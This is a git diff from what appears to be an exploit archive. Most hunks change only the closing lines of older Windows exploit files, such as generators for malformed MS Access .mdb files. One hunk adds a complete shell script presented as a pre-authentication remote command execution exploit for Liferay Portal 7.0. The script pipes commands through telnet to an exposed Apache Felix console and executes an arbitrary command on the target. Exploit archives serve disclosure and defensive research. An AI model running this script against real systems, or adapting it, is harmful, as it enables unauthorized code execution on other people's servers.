a/platforms/windows/local/927.c b/platforms/windows/local/927.c index fa43dba92..ec5820edf 100755 --- a/platforms/windows/local/927.c +++ b/platforms/windows/local/927.c @@ -276,6 +276,6 @@ fclose(filename_mdb); printf("Malformed .mdb file created.\n"); printf("Now open with MSAccess.\n"); return 0; -} - -// milw0rm.com [2005-04-11] +} + +// milw0rm.com [2005-04-11] diff --git a/platforms/windows/local/929.py b/platforms/windows/local/929.py index 86ba8c30c..5f536008e 100755 --- a/platforms/windows/local/929.py +++ b/platforms/windows/local/929.py @@ -219,6 +219,6 @@ mdb += "\x00" * (94208 -len(mdb)) fileOut = open(sys.argv[3],"wb") fileOut.write(mdb) -fileOut.close() - -# milw0rm.com [2005-04-12] +fileOut.close() + +# milw0rm.com [2005-04-12] diff --git a/platforms/windows/local/951.py b/platforms/windows/local/951.py index 3e254875f..854eec447 100755 --- a/platforms/windows/local/951.py +++ b/platforms/windows/local/951.py @@ -210,6 +210,6 @@ mdb += "\x00" * (94208 -len(mdb)) fileOut = open(sys.argv[3],"wb") fileOut.write(mdb) -fileOut.close() - -# milw0rm.com [2005-04-22] +fileOut.close() + +# milw0rm.com [2005-04-22] diff --git a/platforms/windows/remote/35652.sh b/platforms/windows/remote/35652.sh new file mode 100755 index 000000000..62f3891a8 --- /dev/null +++ b/platforms/windows/remote/35652.sh @@ -0,0 +1,25 @@ +#!/bin/sh + +# Exploit title: Liferay Portal 7.0 RCE +# Date: 11/16/2014 +# Exploit author: drone (@dronesec) +# Vendor homepage: http://www.liferay.com/ +# Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip +# Version: 7.0.0/7.0.1/7.0.2 +# Fixed in: 7.0.3 +# Tested on: Windows 7 + +# Pre-auth command injection using an exposed Apache Felix, +# exposed by default on all Liferay Portal 7.0 installs. +# +# ./liferay_portal7.sh 192.168.1.1 "cmd.exe /C calc.exe" +# + + +(echo open $1 11311 +sleep 1 +echo system:getproperties +sleep 1 +echo exec \"$2\" +sleep 1 +) | telnet diff --git a/platforms/windows/remote/868.cpp b/platforms/windows/remote/868.cpp index eb3fbfd2e..5a82d534a 100755 --- a/platforms/windows/remote/868.cpp +++ b/platforms/windows/remote/868.cpp @@ -83,6 +83,6 @@ int main(int argc, char* argv[]) fclose (cssfile); return 0; -} - -// milw0rm.com [2005-03-09] +} + +// milw0rm.com [2005-03-09]